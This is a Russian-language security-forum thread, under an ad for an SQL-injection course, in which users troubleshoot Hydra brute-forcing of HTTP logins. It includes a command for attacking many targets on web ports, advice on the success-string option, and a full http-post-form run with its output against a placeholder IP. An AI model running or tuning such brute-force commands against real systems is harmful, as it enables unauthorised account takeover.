• 15 апреля стартует «Курс «SQL-injection Master» ©» от команды The Codeby

    За 3 месяца вы пройдете путь от начальных навыков работы с SQL-запросами к базам данных до продвинутых техник. Научитесь находить уязвимости связанные с базами данных, и внедрять произвольный SQL-код в уязвимые приложения.

    На последнюю неделю приходится экзамен, где нужно будет показать свои навыки, взломав ряд уязвимых учебных сайтов, и добыть флаги. Успешно сдавшие экзамен получат сертификат.

    Запись на курс до 25 апреля. Получить промодоступ ...

Проблема Проблема с брутом через Hydra

OneTrust

Green Team
11.05.2017
35
12
BIT
0
Всем привет. У меня два вопроса:

1. Использовал Hydra для брута 80 порта. Вводил такую команду: hydra -l admin -P pass.txt -o good.txt -t 16 -vV -M targets.txt http-get
После успешного подбора одно из паролей в файл и на экране были показаны все пароли с файла good.txt. Как сделать так, чтобы отображался только один и правильный пароль?
44.jpg


2. Все же не получилось настроить Hydra для брута доступов к портам 8080, 8000. Кто-то использовал утилиту в данном направлении? Есть какие-то мысли или утилиты, чтобы массово брутить под эти запросы?Заранее благодарен за ответ. :)
 

Vertigo

Lex mea est Vulgate Linux
Gold Team
15.02.2017
1 318
3 999
BIT
1
Всем привет. У меня два вопроса:

Как сделать так, чтобы отображался только один и правильный пароль?
Там есть функция incorrect , которая позволяет это настроить .Параметр - большая S
Настраиваете под сообщение типа : " password found " в конце запроса.
Массово не пробовал.
 
  • Нравится
Реакции: ghostphisher и OneTrust

+Maxon4ik

Green Team
06.03.2018
23
48
BIT
0
Может быть кто в курсе? у меня тоже проблема и параметры -F, -S не помогают.... в общем получается так что на один логин приходится несколько верных паролей, хотя это не так....что можно придумать? Единственное отличие кода страницы до ввода пароля и после- это фраза "Пользователь не найден", и больше ничего!!!
Код:
$hydra -vV -l 14141414 -P pass http-post-form://111.111.111.111 -m '/eng.php:login=^USER^&pass=^PASS^:Пользователь'

Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
[DATA] max 8 tasks per 1 server, overall 8 tasks, 8 login tries (l:1/p:8), ~1 try per task
[DATA] attacking http-post-form://111.111.111.111:80//eng.php:login=^USER^&pass=^PASS^:Пользователь
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[ATTEMPT] target 111.111.111.111 - login "14141414" - pass "2135" - 1 of 8 [child 0] (0/0)
[ATTEMPT] target 111.111.111.111 - login "14141414" - pass "2136" - 2 of 8 [child 1] (0/0)
[ATTEMPT] target 111.111.111.111  - login "14141414" - pass "2137" - 3 of 8 [child 2] (0/0)
[ATTEMPT] target 111.111.111.111  - login "14141414" - pass "2138" - 4 of 8 [child 3] (0/0)
[ATTEMPT] target 111.111.111.111  - login "14141414" - pass "2139" - 5 of 8 [child 4] (0/0)
[ATTEMPT] target 111.111.111.111  - login "14141414" - pass "2140" - 6 of 8 [child 5] (0/0)
[ATTEMPT] target 111.111.111.111  - login "14141414" - pass "2141" - 7 of 8 [child 6] (0/0)
[ATTEMPT] target 111.111.111.111  - login "14141414" - pass "2142" - 8 of 8 [child 7] (0/0)
[80][http-post-form] host: 111.111.111.111  login: 14141414   password: 2135
[80][http-post-form] host: 111.111.111.111   login: 14141414   password: 2137
[80][http-post-form] host: 111.111.111.111 login: 14141414   password: 2138
[80][http-post-form] host: 111.111.111.111  login: 14141414   password: 2139
[80][http-post-form] host: 111.111.111.111 login: 14141414   password: 2136
[80][http-post-form] host: 111.111.111.111 login: 14141414   password: 2140
[80][http-post-form] host: 111.111.111.111 login: 14141414   password: 2141
[80][http-post-form] host: 111.111.111.111  login: 14141414   password: 2142
1 of 1 target successfully completed, 8 valid passwords found
 
Последнее редактирование модератором:
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!